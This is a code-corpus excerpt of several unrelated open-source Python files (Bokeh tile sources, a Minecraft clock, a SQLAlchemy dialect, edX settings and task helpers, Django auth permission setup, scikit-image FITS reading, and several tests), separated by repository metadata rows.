Enables continuous horizontal panning by wrapping the x-axis based on bounds of map.
Note that axis coordinates are not wrapped. To toggle axis label visibility, use ``plot.axis.visible = False``.
""")
class TMSTileSource(MercatorTileSource):
"""
The TMSTileSource contains tile config info and provides urls for tiles based on a templated url e.g. ``http://your.tms.server.host/{Z}/{X}/{Y}.png``.
The defining feature of TMS is the tile-origin in located at the bottom-left.
The TMSTileSource can also be helpful in implementing tile renderers for custom tile sets, including non-spatial datasets.
"""
pass
class WMTSTileSource(MercatorTileSource):
"""
The ``WMTSTileSource`` behaves much like ``TMSTileSource`` but has its tile-origin in the top-left.
This is the most common used tile source for web mapping applications.
Such companies as Google, MapQuest, Stamen, Esri, and OpenStreetMap provide service which use the WMTS specification
e.g. ``http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png``.
"""
pass
class QUADKEYTileSource(MercatorTileSource):
"""
The QUADKEYTileSource has the same tile origin as the WMTSTileSource but requests tiles using a `quadkey` argument instead of X, Y, Z
e.g. ``http://your.quadkey.tile.host/{Q}.png``
"""
pass
class BBoxTileSource(MercatorTileSource):
"""
The BBoxTileSource has the same default tile origin as the WMTSTileSource but requested tiles use a ``{XMIN}``, ``{YMIN}``,
``{XMAX}``, ``{YMAX}`` e.g. ``http://your.custom.tile.service?bbox={XMIN},{YMIN},{XMAX},{YMAX}``.
"""
use_latlon = Bool(default=False, help="""
Flag which indicates option to output {XMIN},{YMIN},{XMAX},{YMAX} in meters or latitude and longitude.
""")
| bsd-3-clause | -4,465,188,448,142,391,000 | 38.375 | 157 | 0.67619 | false |
martinohanlon/minecraft-clock | minecraft-clock.py | 1 | 5099 | #www.stuffaboutcode.com
#Raspberry Pi, Minecraft Analogue Clock
#import the minecraft.py module from the minecraft directory
import minecraft.minecraft as minecraft
#import minecraft block module
import minecraft.block as block
#import time, so delays can be used
import time
#import datetime, to get the time!
import datetime
#import math so we can use cos and sin
import math
def drawCircle(mc, x0, y0, z, radius, blockType):
f = 1 - radius
ddf_x = 1
ddf_y = -2 * radius
x = 0
y = radius
mc.setBlock(x0, y0 + radius, z, blockType)
mc.setBlock(x0, y0 - radius, z, blockType)
mc.setBlock(x0 + radius, y0, z, blockType)
mc.setBlock(x0 - radius, y0, z, blockType)
while x < y:
if f >= 0:
y -= 1
ddf_y += 2
f += ddf_y
x += 1
ddf_x += 2
f += ddf_x
mc.setBlock(x0 + x, y0 + y, z, blockType)
mc.setBlock(x0 - x, y0 + y, z, blockType)
mc.setBlock(x0 + x, y0 - y, z, blockType)
mc.setBlock(x0 - x, y0 - y, z, blockType)
mc.setBlock(x0 + y, y0 + x, z, blockType)
mc.setBlock(x0 - y, y0 + x, z, blockType)
mc.setBlock(x0 + y, y0 - x, z, blockType)
mc.setBlock(x0 - y, y0 - x, z, blockType)
def drawLine(mc, x, y, z, x2, y2, blockType):
"""Brensenham line algorithm"""
steep = 0
coords = []
dx = abs(x2 - x)
if (x2 - x) > 0: sx = 1
else: sx = -1
dy = abs(y2 - y)
if (y2 - y) > 0: sy = 1
else: sy = -1
if dy > dx:
steep = 1
x,y = y,x
dx,dy = dy,dx
sx,sy = sy,sx
d = (2 * dy) - dx
for i in range(0,dx):
if steep: mc.setBlock(y, x, z, blockType)
else: mc.setBlock(x, y, z, blockType)
while d >= 0:
y = y + sy
d = d - (2 * dx)
x = x + sx
d = d + (2 * dy)
mc.setBlock(x2, y2, z, blockType)
def findPointOnCircle(cx, cy, radius, angle):
x = cx + math.sin(math.radians(angle)) * radius
y = cy + math.cos(math.radians(angle)) * radius
return((int(x + 0.5),int(y + 0.5)))
def getAngleForHand(positionOnClock):
angle = 360 * (positionOnClock / 60.0)
return angle
def drawHourHand(mc, clockCentre, hours, minutes, blockType):
if (hours > 11): hours = hours - 12
angle = getAngleForHand(int((hours * 5) + (minutes * (5.0/60.0))))
hourHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 10.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z - 1, hourHandEnd[0], hourHandEnd[1], blockType)
def drawMinuteHand(mc, clockCentre, minutes, blockType):
angle = getAngleForHand(minutes)
minuteHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 18.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z, minuteHandEnd[0], minuteHandEnd[1], blockType)
def drawSecondHand(mc, clockCentre, seconds, blockType):
angle = getAngleForHand(seconds)
secondHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 20.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z + 1, secondHandEnd[0], secondHandEnd[1], blockType)
def drawClock(mc, clockCentre, radius, time):
blockType = block.DIAMOND_BLOCK
#draw the circle
drawCircle(mc, clockCentre.x, clockCentre.y, clockCentre.z, radius, blockType)
#draw hour hand
drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT)
#draw minute hand
drawMinuteHand(mc, clockCentre, time.minute, block.STONE)
#draw second hand
drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS)
def updateTime(mc, clockCentre, lastTime, time):
#draw hour and minute hand
if (lastTime.minute != time.minute):
#clear hour hand
drawHourHand(mc, clockCentre, lastTime.hour, lastTime.minute, block.AIR)
#new hour hand
drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT)
#clear hand
drawMinuteHand(mc, clockCentre, lastTime.minute, block.AIR)
#new hand
drawMinuteHand(mc, clockCentre, time.minute, block.STONE)
#draw second hand
if (lastTime.second != time.second):
#clear hand
drawSecondHand(mc, clockCentre, lastTime.second, block.AIR)
#new hand
drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS)
if __name__ == "__main__":
clockCentre = minecraft.Vec3(0, 30, 0)
radius = 20
print "STARTED"
time.sleep(5)
#Connect to minecraft by creating the minecraft object
# - minecraft needs to be running and in a game
mc = minecraft.Minecraft.create()
#Post a message to the minecraft chat window
mc.postToChat("Hi, Minecraft Analogue Clock, www.stuffaboutcode.com")
time.sleep(2)
lastTime = datetime.datetime.now()
drawClock(mc, clockCentre, radius, lastTime)
try:
while True:
nowTime = datetime.datetime.now()
updateTime(mc, clockCentre, lastTime, nowTime)
lastTime = nowTime
time.sleep(0.5)
except KeyboardInterrupt:
print "stopped"
| mit | -9,020,346,614,343,049,000 | 32.326797 | 112 | 0.622867 | false |
foss-transportationmodeling/rettina-server | flask/local/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/adodbapi.py | 80 | 2493 | # mssql/adodbapi.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql+adodbapi
:name: adodbapi
:dbapi: adodbapi
:connectstring: mssql+adodbapi://<username>:<password>@<dsnname>
:url: http://adodbapi.sourceforge.net/
.. note::
The adodbapi dialect is not implemented SQLAlchemy versions 0.6 and
above at this time.
"""
import datetime
from sqlalchemy import types as sqltypes, util
from sqlalchemy.dialects.mssql.base import MSDateTime, MSDialect
import sys
class MSDateTime_adodbapi(MSDateTime):
def result_processor(self, dialect, coltype):
def process(value):
# adodbapi will return datetimes with empty time
# values as datetime.date() objects.
# Promote them back to full datetime.datetime()
if type(value) is datetime.date:
return datetime.datetime(value.year, value.month, value.day)
return value
return process
class MSDialect_adodbapi(MSDialect):
supports_sane_rowcount = True
supports_sane_multi_rowcount = True
supports_unicode = sys.maxunicode == 65535
supports_unicode_statements = True
driver = 'adodbapi'
@classmethod
def import_dbapi(cls):
import adodbapi as module
return module
colspecs = util.update_copy(
MSDialect.colspecs,
{
sqltypes.DateTime: MSDateTime_adodbapi
}
)
def create_connect_args(self, url):
keys = url.query
connectors = ["Provider=SQLOLEDB"]
if 'port' in keys:
connectors.append("Data Source=%s, %s" %
(keys.get("host"), keys.get("port")))
else:
connectors.append("Data Source=%s" % keys.get("host"))
connectors.append("Initial Catalog=%s" % keys.get("database"))
user = keys.get("user")
if user:
connectors.append("User Id=%s" % user)
connectors.append("Password=%s" % keys.get("password", ""))
else:
connectors.append("Integrated Security=SSPI")
return [[";".join(connectors)], {}]
def is_disconnect(self, e, connection, cursor):
return isinstance(e, self.dbapi.adodbapi.DatabaseError) and \
"'connection failure'" in str(e)
dialect = MSDialect_adodbapi
| apache-2.0 | -4,131,000,080,868,442,000 | 30.1625 | 76 | 0.632972 | false |
okanasik/JdeRobot | src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_smartcamera/sc_config.py | 4 | 5131 | """
SmartCameraConfig class : handles config for the smart_camera project
smart_camera.cnf file is created in the local directory
other classes or files wishing to use this class should add
import sc_config
"""
from os.path import expanduser
import ConfigParser
class SmartCameraConfig(object):
def __init__(self):
# default config file
self.config_file = expanduser("~/smart_camera.cnf")
# print config file location
print ("config file: %s" % self.config_file)
# create the global parser object
self.parser = ConfigParser.SafeConfigParser()
# read the config file into memory
self.read()
# read - reads the contents of the file into the dictionary in RAM
def read(self):
try:
self.parser.read(self.config_file)
except IOError as e:
print ('Error {0} reading config file: {1}: '.format(e.errno, e.strerror))
return
# save - saves the config to disk
def save(self):
try:
with open(self.config_file, 'wb') as configfile:
self.parser.write(configfile)
except IOError as e:
print ('Error {0} writing config file: {1}: '.format(e.errno, e.strerror))
return
# check_section - ensures the section exists, creates it if not
def check_section(self, section):
if not self.parser.has_section(section):
self.parser.add_section(section)
return
# get_boolean - returns the boolean found in the specified section/option or the default if not found
def get_boolean(self, section, option, default):
try:
return self.parser.getboolean(section, option)
except ConfigParser.Error:
return default
# set_boolean - sets the boolean to the specified section/option
def set_boolean(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(bool(new_value)))
return
# get_integer - returns the integer found in the specified section/option or the default if not found
def get_integer(self, section, option, default):
try:
return self.parser.getint(section, option)
except ConfigParser.Error:
return default
# set_integer - sets the integer to the specified section/option
def set_integer(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(int(new_value)))
return
# get_float - returns the float found in the specified section/option or the default if not found
def get_float(self, section, option, default):
try:
return self.parser.getfloat(section, option)
except ConfigParser.Error:
return default
# set_float - sets the float to the specified section/option
def set_float(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(float(new_value)))
return
# get_string - returns the string found in the specified section/option or the default if not found
def get_string(self, section, option, default):
try:
return self.parser.get(section, option)
except ConfigParser.Error:
return default
# set_string - sets the string to the specified section/option
def set_string(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(new_value))
return
# main - tests SmartCameraConfig class
def main(self):
# print welcome message
print ("SmartCameraConfig v1.0 test")
print ("config file: %s" % self.config_file)
# write and read a boolean
section = 'Test_Section1'
option = 'Test_boolean'
print ("Writing %s/%s = True" % (section,option))
self.set_boolean(section,option,True)
print ("Read %s/%s : %s" % (section, option, self.get_boolean(section, option, False)))
# write and read an integer
section = 'Test_Section1'
option = 'Test_integer'
print ("Writing %s/%s = 11" % (section,option))
self.set_integer(section,option,11)
print ("Read %s/%s : %s" % (section, option, self.get_integer(section, option, 99)))
# write and read a float
section = 'Test_Section1'
option = 'Test_float'
print ("Writing %s/%s = 12.345" % (section,option))
self.set_float(section,option,12.345)
print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 0.01)))
# read an undefined number to get back the default
section = 'Test_Section2'
option = 'test_default'
print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 21.21)))
# save the config file
self.save()
return
# declare global config object
config = SmartCameraConfig()
# run the main routine if this is file is called from the command line
if __name__ == "__main__":
config.main()
| gpl-3.0 | 1,335,329,736,126,037,500 | 34.143836 | 105 | 0.630481 | false |
cselis86/edx-platform | lms/envs/devstack.py | 6 | 4593 | """
Specific overrides to the base prod settings to make development easier.
"""
from .aws import * # pylint: disable=wildcard-import, unused-wildcard-import
# Don't use S3 in devstack, fall back to filesystem
del DEFAULT_FILE_STORAGE
MEDIA_ROOT = "/edx/var/edxapp/uploads"
DEBUG = True
USE_I18N = True
TEMPLATE_DEBUG = True
SITE_NAME = 'localhost:8000'
# By default don't use a worker, execute tasks as if they were local functions
CELERY_ALWAYS_EAGER = True
################################ LOGGERS ######################################
import logging
# Disable noisy loggers
for pkg_name in ['track.contexts', 'track.middleware', 'dd.dogapi']:
logging.getLogger(pkg_name).setLevel(logging.CRITICAL)
################################ EMAIL ########################################
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
FEATURES['ENABLE_INSTRUCTOR_EMAIL'] = True # Enable email for all Studio courses
FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] = False # Give all courses email (don't require django-admin perms)
########################## ANALYTICS TESTING ########################
ANALYTICS_SERVER_URL = "http://127.0.0.1:9000/"
ANALYTICS_API_KEY = ""
# Set this to the dashboard URL in order to display the link from the
# dashboard to the Analytics Dashboard.
ANALYTICS_DASHBOARD_URL = None
################################ DEBUG TOOLBAR ################################
INSTALLED_APPS += ('debug_toolbar', 'debug_toolbar_mongo')
MIDDLEWARE_CLASSES += (
'django_comment_client.utils.QueryCountDebugMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar_mongo.panel.MongoDebugPanel',
'debug_toolbar.panels.profiling.ProfilingPanel',
)
DEBUG_TOOLBAR_CONFIG = {
'SHOW_TOOLBAR_CALLBACK': 'lms.envs.devstack.should_show_debug_toolbar'
}
def should_show_debug_toolbar(_):
return True # We always want the toolbar on devstack regardless of IP, auth, etc.
########################### PIPELINE #################################
PIPELINE_SASS_ARGUMENTS = '--debug-info --require {proj_dir}/static/sass/bourbon/lib/bourbon.rb'.format(proj_dir=PROJECT_ROOT)
########################### VERIFIED CERTIFICATES #################################
FEATURES['AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'] = True
FEATURES['ENABLE_PAYMENT_FAKE'] = True
CC_PROCESSOR_NAME = 'CyberSource2'
CC_PROCESSOR = {
'CyberSource2': {
"PURCHASE_ENDPOINT": '/shoppingcart/payment_fake/',
"SECRET_KEY": 'abcd123',
"ACCESS_KEY": 'abcd123',
"PROFILE_ID": 'edx',
}
}
########################### External REST APIs #################################
FEATURES['ENABLE_OAUTH2_PROVIDER'] = True
OAUTH_OIDC_ISSUER = 'http://127.0.0.1:8000/oauth2'
FEATURES['ENABLE_MOBILE_REST_API'] = True
FEATURES['ENABLE_VIDEO_ABSTRACTION_LAYER_API'] = True
########################## SECURITY #######################
FEATURES['ENFORCE_PASSWORD_POLICY'] = False
FEATURES['ENABLE_MAX_FAILED_LOGIN_ATTEMPTS'] = False
FEATURES['SQUELCH_PII_IN_LOGS'] = False
FEATURES['PREVENT_CONCURRENT_LOGINS'] = False
FEATURES['ADVANCED_SECURITY'] = False
PASSWORD_MIN_LENGTH = None
PASSWORD_COMPLEXITY = {}
########################### Milestones #################################
FEATURES['MILESTONES_APP'] = True
########################### Entrance Exams #################################
FEATURES['ENTRANCE_EXAMS'] = True
########################## Courseware Search #######################
FEATURES['ENABLE_COURSEWARE_SEARCH'] = True
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
########################## Certificates Web/HTML View #######################
FEATURES['CERTIFICATES_HTML_VIEW'] = True
#####################################################################
# See if the developer has any local overrides.
try:
from .private import * # pylint: disable=import-error
except ImportError:
pass
#####################################################################
# Lastly, run any migrations, if needed.
MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE)
SECRET_KEY = '85920908f28904ed733fe576320db18cabd7b6cd'
| agpl-3.0 | -8,045,075,856,478,398,000 | 32.043165 | 126 | 0.599608 | false |
youprofit/scikit-image | skimage/io/_plugins/fits_plugin.py | 28 | 4735 | __all__ = ['imread', 'imread_collection']
import skimage.io as io
try:
from astropy.io import fits as pyfits
except ImportError:
try:
import pyfits
except ImportError:
raise ImportError(
"PyFITS could not be found. Please refer to\n"
"http://www.stsci.edu/resources/software_hardware/pyfits\n"
"for further instructions.")
def imread(fname, dtype=None):
"""Load an image from a FITS file.
Parameters
----------
fname : string
Image file name, e.g. ``test.fits``.
dtype : dtype, optional
For FITS, this argument is ignored because Stefan is planning on
removing the dtype argument from imread anyway.
Returns
-------
img_array : ndarray
Unlike plugins such as PIL, where different colour bands/channels are
stored in the third dimension, FITS images are greyscale-only and can
be N-dimensional, so an array of the native FITS dimensionality is
returned, without colour channels.
Currently if no image is found in the file, None will be returned
Notes
-----
Currently FITS ``imread()`` always returns the first image extension when
given a Multi-Extension FITS file; use ``imread_collection()`` (which does
lazy loading) to get all the extensions at once.
"""
hdulist = pyfits.open(fname)
# Iterate over FITS image extensions, ignoring any other extension types
# such as binary tables, and get the first image data array:
img_array = None
for hdu in hdulist:
if isinstance(hdu, pyfits.ImageHDU) or \
isinstance(hdu, pyfits.PrimaryHDU):
if hdu.data is not None:
img_array = hdu.data
break
hdulist.close()
return img_array
def imread_collection(load_pattern, conserve_memory=True):
"""Load a collection of images from one or more FITS files
Parameters
----------
load_pattern : str or list
List of extensions to load. Filename globbing is currently
unsupported.
converve_memory : bool
If True, never keep more than one in memory at a specific
time. Otherwise, images will be cached once they are loaded.
Returns
-------
ic : ImageCollection
Collection of images.
"""
intype = type(load_pattern)
if intype is not list and intype is not str:
raise TypeError("Input must be a filename or list of filenames")
# Ensure we have a list, otherwise we'll end up iterating over the string:
if intype is not list:
load_pattern = [load_pattern]
# Generate a list of filename/extension pairs by opening the list of
# files and finding the image extensions in each one:
ext_list = []
for filename in load_pattern:
hdulist = pyfits.open(filename)
for n, hdu in zip(range(len(hdulist)), hdulist):
if isinstance(hdu, pyfits.ImageHDU) or \
isinstance(hdu, pyfits.PrimaryHDU):
# Ignore (primary) header units with no data (use '.size'
# rather than '.data' to avoid actually loading the image):
try:
data_size = hdu.size()
except TypeError: # (size changed to int in PyFITS 3.1)
data_size = hdu.size
if data_size > 0:
ext_list.append((filename, n))
hdulist.close()
return io.ImageCollection(ext_list, load_func=FITSFactory,
conserve_memory=conserve_memory)
def FITSFactory(image_ext):
"""Load an image extension from a FITS file and return a NumPy array
Parameters
----------
image_ext : tuple
FITS extension to load, in the format ``(filename, ext_num)``.
The FITS ``(extname, extver)`` format is unsupported, since this
function is not called directly by the user and
``imread_collection()`` does the work of figuring out which
extensions need loading.
"""
# Expect a length-2 tuple with a filename as the first element:
if not isinstance(image_ext, tuple):
raise TypeError("Expected a tuple")
if len(image_ext) != 2:
raise ValueError("Expected a tuple of length 2")
filename = image_ext[0]
extnum = image_ext[1]
if type(filename) is not str or type(extnum) is not int:
raise ValueError("Expected a (filename, extension) tuple")
hdulist = pyfits.open(filename)
data = hdulist[extnum].data
hdulist.close()
if data is None:
raise RuntimeError(
"Extension %d of %s has no data" % (extnum, filename))
return data
| bsd-3-clause | 4,908,009,772,469,554,000 | 30.357616 | 78 | 0.618374 | false |
nickmoline/feedsanitizer | django/contrib/auth/management/__init__.py | 104 | 2973 | """
Creates permissions for all installed apps that need permissions.
"""
from django.contrib.auth import models as auth_app
from django.db.models import get_models, signals
def _get_permission_codename(action, opts):
return u'%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts):
"Returns (codename, name) for all permissions in the given opts."
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw)))
return perms + list(opts.permissions)
def create_permissions(app, created_models, verbosity, **kwargs):
from django.contrib.contenttypes.models import ContentType
app_models = get_models(app)
# This will hold the permissions we're looking for as
# (content_type, (codename, name))
searched_perms = list()
# The codenames and ctypes that should exist.
ctypes = set()
for klass in app_models:
ctype = ContentType.objects.get_for_model(klass)
ctypes.add(ctype)
for perm in _get_all_permissions(klass._meta):
searched_perms.append((ctype, perm))
# Find all the Permissions that have a context_type for a model we're
# looking for. We don't need to check for codenames since we already have
# a list of the ones we're going to create.
all_perms = set()
ctypes_pks = set(ct.pk for ct in ctypes)
for ctype, codename in auth_app.Permission.objects.all().values_list(
'content_type', 'codename')[:1000000]:
if ctype in ctypes_pks:
all_perms.add((ctype, codename))
for ctype, (codename, name) in searched_perms:
# If the permissions exists, move on.
if (ctype.pk, codename) in all_perms:
continue
p = auth_app.Permission.objects.create(
codename=codename,
name=name,
content_type=ctype
)
if verbosity >= 2:
print "Adding permission '%s'" % p
def create_superuser(app, created_models, verbosity, **kwargs):
from django.core.management import call_command
if auth_app.User in created_models and kwargs.get('interactive', True):
msg = ("\nYou just installed Django's auth system, which means you "
"don't have any superusers defined.\nWould you like to create one "
"now? (yes/no): ")
confirm = raw_input(msg)
while 1:
if confirm not in ('yes', 'no'):
confirm = raw_input('Please enter either "yes" or "no": ')
continue
if confirm == 'yes':
call_command("createsuperuser", interactive=True)
break
signals.post_syncdb.connect(create_permissions,
dispatch_uid = "django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
| mit | -8,188,956,168,340,695,000 | 37.61039 | 110 | 0.643121 | false |
iradul/phantomjs-clone | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/suggestnominations_unittest.py | 121 | 4444 | # Copyright (C) 2011 Google Inc. All rights reserved.
# Copyright (C) 2011 Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.commands.commandtest import CommandsTest
from webkitpy.tool.commands.suggestnominations import SuggestNominations
from webkitpy.tool.mocktool import MockOptions, MockTool
class SuggestNominationsTest(CommandsTest):
mock_git_output = """commit 60831dde5beb22f35aef305a87fca7b5f284c698
Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2011-09-15 19:56:21 +0000
Value profiles collect no information for global variables
https://bugs.webkit.org/show_bug.cgi?id=68143
Reviewed by Geoffrey Garen.
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
mock_same_author_commit_message = """Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2011-09-15 19:56:21 +0000
Value profiles collect no information for global variables
https://bugs.webkit.org/show_bug.cgi?id=68143
Reviewed by Geoffrey Garen.
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
def _make_options(self, **kwargs):
defaults = {
'committer_minimum': 10,
'max_commit_age': 9,
'reviewer_minimum': 80,
'show_commits': False,
'verbose': False,
}
options = MockOptions(**defaults)
options.update(**kwargs)
return options
def test_recent_commit_messages(self):
tool = MockTool()
suggest_nominations = SuggestNominations()
suggest_nominations._init_options(options=self._make_options())
suggest_nominations.bind_to_tool(tool)
tool.executive.run_command = lambda command: self.mock_git_output
self.assertEqual(list(suggest_nominations._recent_commit_messages()), [self.mock_same_author_commit_message])
mock_non_committer_commit_message = """
Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2009-09-15 14:08:42 +0000
Let TestWebKitAPI work for chromium
https://bugs.webkit.org/show_bug.cgi?id=67756
Patch by Xianzhu Wang <[email protected]> on 2011-09-15
Reviewed by Sam Weinig.
Source/WebKit/chromium:
* WebKit.gyp:
git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95188 268f45cc-cd09-0410-ab3c-d52691b4dbfc
"""
def test_basic(self):
expected_stdout = "REVIEWER: Xianzhu Wang ([email protected]) has 88 reviewed patches\n"
options = self._make_options()
suggest_nominations = SuggestNominations()
suggest_nominations._init_options(options=options)
suggest_nominations._recent_commit_messages = lambda: [self.mock_non_committer_commit_message for _ in range(88)]
self.assert_execute_outputs(suggest_nominations, [], expected_stdout=expected_stdout, options=options)
| bsd-3-clause | -3,160,849,053,707,772,000 | 42.145631 | 121 | 0.743474 | false |
paran0ids0ul/infernal-twin | build/reportlab/tests/test_widgetbase_tpc.py | 15 | 2997 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
"""
Tests for TypedPropertyCollection class.
"""
__version__='''$Id$'''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation
setOutDir(__name__)
import os, sys, copy
from os.path import join, basename, splitext
import unittest
from reportlab.graphics.widgetbase import PropHolder, TypedPropertyCollection
from reportlab.lib.attrmap import AttrMap, AttrMapValue
from reportlab.lib.validators import isNumber
TPC = TypedPropertyCollection
class PH(PropHolder):
_attrMap = AttrMap(
a = AttrMapValue(isNumber),
b = AttrMapValue(isNumber)
)
class APH(PH):
def __init__(self):
self.a = 1
class BPH(APH):
def __init__(self):
APH.__init__(self)
def __getattr__(self,name):
if name=='b': return -1
raise AttributeError
class TPCTestCase(unittest.TestCase):
"Test TypedPropertyCollection class."
def test0(self):
"Test setting an invalid collective attribute."
t = TPC(PH)
try:
t.c = 42
except AttributeError:
pass
def test1(self):
"Test setting a valid collective attribute."
t = TPC(PH)
t.a = 42
assert t.a == 42
def test2(self):
"Test setting a valid collective attribute with an invalid value."
t = TPC(PH)
try:
t.a = 'fourty-two'
except AttributeError:
pass
def test3(self):
"Test setting a valid collective attribute with a convertible invalid value."
t = TPC(PH)
t.a = '42'
assert t.a == '42' # Or should it rather be an integer?
def test4(self):
"Test accessing an unset collective attribute."
t = TPC(PH)
try:
t.a
except AttributeError:
pass
def test5(self):
"Test overwriting a collective attribute in one slot."
t = TPC(PH)
t.a = 42
t[0].a = 4242
assert t[0].a == 4242
def test6(self):
"Test overwriting a one slot attribute with a collective one."
t = TPC(PH)
t[0].a = 4242
t.a = 42
assert t[0].a == 4242
def test7(self):
"Test to ensure we can handle classes with __getattr__ methods"
a=TypedPropertyCollection(APH)
b=TypedPropertyCollection(BPH)
a.a=3
b.a=4
try:
a.b
assert 1, "Shouldn't be able to see a.b"
except AttributeError:
pass
a.b=0
assert a.b==0, "Wrong value for "+str(a.b)
assert b.b==-1, "This should call __getattr__ special"
b.b=0
assert a[0].b==0
assert b[0].b==-1, "Class __getattr__ should return -1"
def makeSuite():
return makeSuiteForClasses(TPCTestCase)
#noruntests
if __name__ == "__main__":
unittest.TextTestRunner().run(makeSuite())
printLocation()
| gpl-3.0 | 5,591,823,480,198,696,000 | 21.036765 | 85 | 0.584585 | false |
ahmedaljazzar/edx-platform | lms/djangoapps/instructor_task/tasks_helper/runner.py | 16 | 5153 | import json
import logging
from time import time
from celery import current_task
from django.db import reset_queries
import dogstats_wrapper as dog_stats_api
from lms.djangoapps.instructor_task.models import PROGRESS, InstructorTask
from util.db import outer_atomic
TASK_LOG = logging.getLogger('edx.celery.task')
class TaskProgress(object):
"""
Encapsulates the current task's progress by keeping track of
'attempted', 'succeeded', 'skipped', 'failed', 'total',
'action_name', and 'duration_ms' values.
"""
def __init__(self, action_name, total, start_time):
self.action_name = action_name
self.total = total
self.start_time = start_time
self.attempted = 0
self.succeeded = 0
self.skipped = 0
self.failed = 0
self.preassigned = 0
def update_task_state(self, extra_meta=None):
"""
Update the current celery task's state to the progress state
specified by the current object. Returns the progress
dictionary for use by `run_main_task` and
`BaseInstructorTask.on_success`.
Arguments:
extra_meta (dict): Extra metadata to pass to `update_state`
Returns:
dict: The current task's progress dict
"""
progress_dict = {
'action_name': self.action_name,
'attempted': self.attempted,
'succeeded': self.succeeded,
'skipped': self.skipped,
'failed': self.failed,
'total': self.total,
'preassigned': self.preassigned,
'duration_ms': int((time() - self.start_time) * 1000),
}
if extra_meta is not None:
progress_dict.update(extra_meta)
_get_current_task().update_state(state=PROGRESS, meta=progress_dict)
return progress_dict
def run_main_task(entry_id, task_fcn, action_name):
"""
Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.
Arguments passed to `task_fcn` are:
`entry_id` : the primary key for the InstructorTask entry representing the task.
`course_id` : the id for the course.
`task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
`action_name` : past-tense verb to use for constructing status messages.
If no exceptions are raised, the `task_fcn` should return a dict containing
the task's result with the following keys:
'attempted': number of attempts made
